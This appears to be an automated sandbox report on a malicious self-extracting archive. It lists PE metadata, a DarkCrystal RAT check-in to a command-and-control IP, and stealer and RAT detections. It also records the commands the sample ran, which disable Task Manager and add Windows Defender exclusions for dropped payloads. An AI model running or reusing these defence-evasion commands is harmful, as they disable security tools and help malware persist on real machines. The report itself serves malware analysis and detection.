TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FD2212A757Bh
jmp 00007FD2212A6E8Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD221299CD7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FD2212AA31Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FD2212A701Ch
push 0000000Ch
push esi
call 00007FD2212A65D9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD221299C52h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD2212A9DD9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD2212A6F98h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD2212A9DBCh
int3
jmp 00007FD2212AB857h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T17:23:18.164609+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.7	49898	91.199.45.187	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 17:22:56.770483971 CEST	49898	80	192.168.2.7	91.199.45.187
Oct 14, 2024 17:22:56.775530100 CEST	80	49898	91.199.45.187	192.168.2.7
Oct 14, 2024 17:22:56.775609016 CEST	49898	80	192.168.2.7	91.199.45.187
Oct 14, 2024 17:22:56.776237011 CEST	49898	80	192.168.2.7	91.199.45.187
Oct 14, 2024 17:22:56.781096935 CEST	80	49898	91.199.45.187	192.168.2.7
Oct 14, 2024 17:22:57.124506950 CEST	49898	80	192.168.2.7	91.199.45.187
Oct 14, 2024 17:22:57.129616976 CEST	80	49898	91.199.45.187	192.168.2.7
Oct 14, 2024 17:23:18.164510965 CEST	80	49898	91.199.45.187	192.168.2.7
Oct 14, 2024 17:23:18.164608955 CEST	49898	80	192.168.2.7	91.199.45.187
Oct 14, 2024 17:23:18.172642946 CEST	49898	80	192.168.2.7	91.199.45.187
Oct 14, 2024 17:23:18.177422047 CEST	80	49898	91.199.45.187	192.168.2.7

HTTP Request Dependency Graph

91.199.45.187

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49898	91.199.45.187	80	576	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 17:22:56.776237011 CEST	308	OUT	POST /eternalgameSqlflowerDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 91.199.45.187 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 14, 2024 17:22:57.124506950 CEST	344	OUT	Data Raw: 00 01 04 01 03 0a 01 0a 05 06 02 01 02 04 01 0b 00 07 05 0f 02 07 03 0c 00 02 0d 07 04 50 01 57 0a 01 03 0d 02 56 06 07 0e 06 04 06 05 56 04 04 06 53 0b 0b 0a 03 04 0a 04 02 07 54 06 05 05 0f 01 02 0f 5d 00 02 05 06 0e 0e 0c 0f 0d 03 0c 02 07 03 Data Ascii: PWVVST]]WWVW\L~\|^P@wmuvcThliMwRU^hM^{\|gx`j\|}{Pwtw\i_~V@@z}f}La

Target ID:	0
Start time:	11:22:17
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\kBY9lgRaca.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kBY9lgRaca.exe"
Imagebase:	0xcb0000
File size:	3'589'074 bytes
MD5 hash:	3BFA5607BA2FDB912BF3C1B06950BE30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:22:18
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe"
Imagebase:	0xc20000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:22:34
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:22:34
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:22:34
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0x360000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:22:34
Start date:	14/10/2024
Path:	C:\RuntimeDll\cef_process.exe
Wow64 process (32bit):	false
Commandline:	"C:\RuntimeDll/cef_process.exe"
Imagebase:	0xb10000
File size:	3'728'384 bytes
MD5 hash:	C73DF0A231280439C24218C394E0A546
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	12:34:59
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	12:35:00
Start date:	14/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat"
Imagebase:	0x7ff785e40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:35:00
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:35:00
Start date:	14/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff724700000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:35:01
Start date:	14/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7758f0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:35:06
Start date:	14/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:35:11
Start date:	14/10/2024
Path:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"
Imagebase:	0xaa0000
File size:	3'728'384 bytes
MD5 hash:	C73DF0A231280439C24218C394E0A546
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.3%
Total number of Nodes:	1541
Total number of Limit Nodes:	34

Executed Functions

Function 00CCDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CC087C
Part of subcall function 00CC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CC088E
Part of subcall function 00CC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CC08BF

Part of subcall function 00CCA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CCA655

Part of subcall function 00CCAC16: OleInitialize.OLE32(00000000), ref: 00CCAC2F
Part of subcall function 00CCAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CCAC66
Part of subcall function 00CCAC16: SHGetMalloc.SHELL32(00CF8438), ref: 00CCAC70

GetCommandLineW.KERNEL32 ref: 00CCDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CCDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CCDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00CCDFCE

Part of subcall function 00CCDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CCDBF4
Part of subcall function 00CCDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CCDC30

CloseHandle.KERNEL32(00000000), ref: 00CCDFD7
GetModuleFileNameW.KERNEL32(00000000,00D0EC90,00000800), ref: 00CCDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00D0EC90), ref: 00CCDFFE
GetLocalTime.KERNEL32(?), ref: 00CCE009
_swprintf.LIBCMT ref: 00CCE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CCE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00CCE061
LoadIconW.USER32(00000000,00000064), ref: 00CCE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CCE0C9
Sleep.KERNEL32(?), ref: 00CCE0F7
DeleteObject.GDI32 ref: 00CCE130
DeleteObject.GDI32(?), ref: 00CCE140
CloseHandle.KERNEL32 ref: 00CCE183

Strings

winrarsfxmappingfile.tmp, xrefs: 00CCDF77
C:\Users\user\Desktop, xrefs: 00CCDF33
STARTDLG, xrefs: 00CCE0BE
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00CCE039
sfxstime, xrefs: 00CCE055
sfxname, xrefs: 00CCDFF9

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-433059772
Opcode ID: ac171a1e3a2d3bab2d2774489a21302ba450599c18d5a10e21825aea2b35532d
Instruction ID: cf60920f1435703ce0584dea55a6d492229f7f1203bf03ab81a14bf85015aa56
Opcode Fuzzy Hash: ac171a1e3a2d3bab2d2774489a21302ba450599c18d5a10e21825aea2b35532d
Instruction Fuzzy Hash: FB61C271904385AFD320ABA5EC89F7F7BECEB45704F04042DF90AD62A1DA74AA44D772

Function 00CCA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6D5
